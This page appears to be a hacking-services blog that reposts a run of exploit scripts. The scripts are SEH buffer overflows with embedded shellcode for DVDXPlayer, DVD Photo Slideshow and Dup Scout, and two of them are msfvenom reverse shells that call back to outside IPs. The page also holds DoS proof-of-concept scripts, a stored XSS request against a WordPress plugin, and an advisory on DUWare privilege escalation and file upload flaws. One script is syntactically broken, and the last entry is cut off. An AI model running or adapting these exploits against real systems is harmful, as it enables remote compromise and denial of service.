Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153545

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
# Date: 6-3-2019
# Exploit Author: Kevin Randall
# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
# Version: 5.5 Pro
# Tested on: Windows 7
# CVE : N/A

#!/usr/bin/python
###########Create Shellcode with MSFVenom###############################################################################################
##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
########################################################################################################################################
file_name = "payloadofficial.plf"

#######################Copy and Paste Shellcode Here!!###########################
buf =  ""
buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
buf += "\x49\x21\x39\x12"
#################################################################################

#No Operations#
nops = "\x90"*20
shellcode = nops + buf

####Where all the magic happens! :)#####################################################################
buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode))
###################################################################################################
plf_file = open(file_name,"w")
plf_file.write(buffer)
plf_file.close()
HireHackking 
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
long_buffer = "\x44" * 600
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer
try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "key.txt".
#2. Just copy the text inside "key.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10014283)
#0x10014283 : pop ebx # pop ecx # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("key.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
DUWare Multiple Vulnerabilities

Vendor: DUWare
Product: DUWare
Version: Multiple Products
Website: http://www.duware.com/

BID: 9246 

Description:
DUportal Pro is a professional Web portal and online community. DUportal Pro contains numerous advanced features such as Web-based administration, Articles, Banner Ads, Event Calendar, Classified Ads, Web link directory, Downloads, Entertainment, Message Board, Picture Gallery, News, E-Commerce, Members Directory, Polls and Business Directory, and more which can be downloaded online. All modules are customizable via Web-based Admin panel, together with size, skins and themes. 

Problem:
Basically almost all, if not ALL of the products offered by DU Ware (www.duware.com) seem to have been done with an extremely minimal understanding and/or concern of security, and very important aspects of web security such as, but not limited to: Unique Session ID's, Input Validation, and many more. Their software relies HEAVILY on hidden tags, client side input validation, and security through obscurity. Examples of some of the consequences of this weakly implemented/nonexistent security are Script Execution, Arbitrary File Upload, Account Hijacking, Database Exposure, Query Tampering, Code Injection and Server Compromise. 

Remote File Upload:
Pretty much anywhere there are places to upload a picture, or file on DUPortal you can upload a script, or file of your liking. The only limits really are size. The only requirement to exploit this vulnerability is a web browser. Simply save the page to your hard drive, edit out all the client side validation and an attacker may upload any file they wish. This can allow for script execution on the host machine as well as host compromise. 

Script Execution:
Script execution in DU Software Products can take place in a number of ways. The most serious of these is by using the previously mentioned file upload vulnerability to upload any script of your liking. Using that particular method it is obviously not very hard to compromise the security of the entire host. Another way is by injecting script into items that have to be approved by the administrator of the portal. This can also be manipulated by tampering with the hidden form value by the name of "APPROVED". If the item you add requires approval by the administrator, then any code you inject into a particular item will be executed by the administrator unknowingly, thus allowing an attacker to carry out administrative functions via the admin. It is also possible for a user to inject script into their username value, as well as other components and have it executed in the browsers of the portals visitors. 

Account HiJacking:
Having an administrator execute commands and script for an attacker can be bad news, but needless to say it is even worse when an attacker can take over the administrative account, or any other account at will. This is not hard to do and only requires a browser and text editor to execute. Because DU Portal assigns no specific user session id, and relies on hidden fields to change information, it is simple to reset the password of ANY account in the DU Portal database. It is also possible to tamper with cookie data, and gain limited access to arbitrary accounts. 

Privilege Escalation:
When registering an account on a DU Portal installation, a malicious user is able to set themselves to any user level they like by altering the hidden form field value for "U_ACCESS" It is initially set to user, but anyone with a text editor and web browser can change this to admin. 

Query Tampering:
There is little input validation and/or sanitization in DU Portal, so tampering with database queries is not a difficult task. Below are a list of the affected components. 

search.asp
password.asp 
channel.asp 
register.asp 
type.asp 
detail.asp 
post.asp 
submit.asp 

This may not be all of them, but it should be most of them. Hopefully the list above will be incentive enough for the developer to secure all of the portal's components, including any not previously mentioned. 

Hidden Form Field Weakness: As I have mentioned before, this portal system relies HEAVILY on client side validation and especially on hidden form fields/values. By saving any number of pages of a DU Portal an editing an attacker can manipulate much data. Examples include but are not limited to: Administrative Action, Impersonating Other Users, Changing Shop Prices, Account Hi Jacking, and much more. 

Plain Text And Database Disclosure Weakness:
No passwords in the DU Portal database are encrypted. They are also shown in plain text in the admin panel. This is a problem because it can be used by an attacker or malicious administrator to compromise the integrity of users that have a bad habit of using the same password everywhere. The database by default is also available for download at the following location 

http://localhost/database/DUportal.mdb 

This can be avoided however by setting the proper permissions for the directory in which the database is located in or better yet move the entire database to an offline directory. 

Conclusion:
DU Ware offers a large variety of products, and most if not all are bundled into what is "DU Portal" so most of these vulns are present in all of their products. While they may be easy to set up and offer decent functionability it is advised not to install them until the vendor can implement better security into their products. The vendor was contacted, but does not plan on releasing any security patches for these issues. However they do plan to secure their applications in their products next version release. 

Credits:
James Bercegay of the GulfTech Security Research Team.
HireHackking 
# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
# Date: 2021-05-28
# Author: Brian Rodríguez
# Software Site: https://sourceforge.net/projects/dupterminator/
# Version: 1.4.5639.37199
# Category: DoS (Windows)

##### Vulnerability #####

DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Windows 10.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")
HireHackking 
# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-06-11
# Exploit Author: Unk9vvN
# Vendor Homepage: https://duplicate-post.lopo.it/
# Software Link: https://wordpress.org/plugins/duplicate-post/
# Version: 3.2.3
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.

1.Go to the 'Settings' section
2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
3.Click the "Save Changes" option
4.Your payload will run

# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
# Parameter & Payoad: 

duplicate_post_title_prefix="><script>alert(1)</script>
duplicate_post_title_suffix="><script>alert(1)</script>
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
duplicate_post_blacklist="><script>alert(1)</script>


#
# PoC
#
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
Content-Type: application/x-www-form-urlencoded
Content-Length: 981
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1


# Discovered by:
https://t.me/Unk9vvN
HireHackking 
# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
# Date: 2020-01-05
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link:  https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.1.3
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Duplicate Cleaner Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.

#!/usr/bin/env python
buffer =3D "\x41" * 6000

try:
f.open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
HireHackking 
#!/usr/bin/env python
# Exploit Title: Dup Scout Enterprise v 9.9.14
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
    
packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title  : Dup Scout Enterprise v9.9.14 - 'Input Directory' Local
Buffer Overflow
# Date           : 04 Sept, 2017
# Exploit Author : Touhid M.Shaikh - www.touhidshaikh.com
# Contact        : https://github.com/touhidshaikh
# Vendor Homepage: http://www.dupscout.com/
# Version        : v9.9.14
# Software Link  :
https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
# Vuln Software  : Dup Scout Enterprise v9.9.1 (Evaluation)
# Tested On      : Window 7 (x86)
################################################################################


#========================================================================================================================#
# TO Reproduce Attack. |
#========================================================================================================================#
# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input
Directory" and paste the content of Dup_Scout_buffer.txt
#
# Video PoC : https://www.youtube.com/watch?v=vnA0-HR7PCI
##########################################################################################################################


jmpebx = "\x15\x2c\x18\x65"

#badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e
x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

mixed = (
    "\x53"  # push EBX
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656
    )

junk = "\x53\x5b" * 119 + "\x53"

data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4)
+ mixed + junk + buf

a = open("Dup_Scout_buffer.txt", "w")
a.write(data)
a.close()

#Greetz : @Pulkit
HireHackking 
author = '''
  
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
  
# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
# Date: 2017.05.24
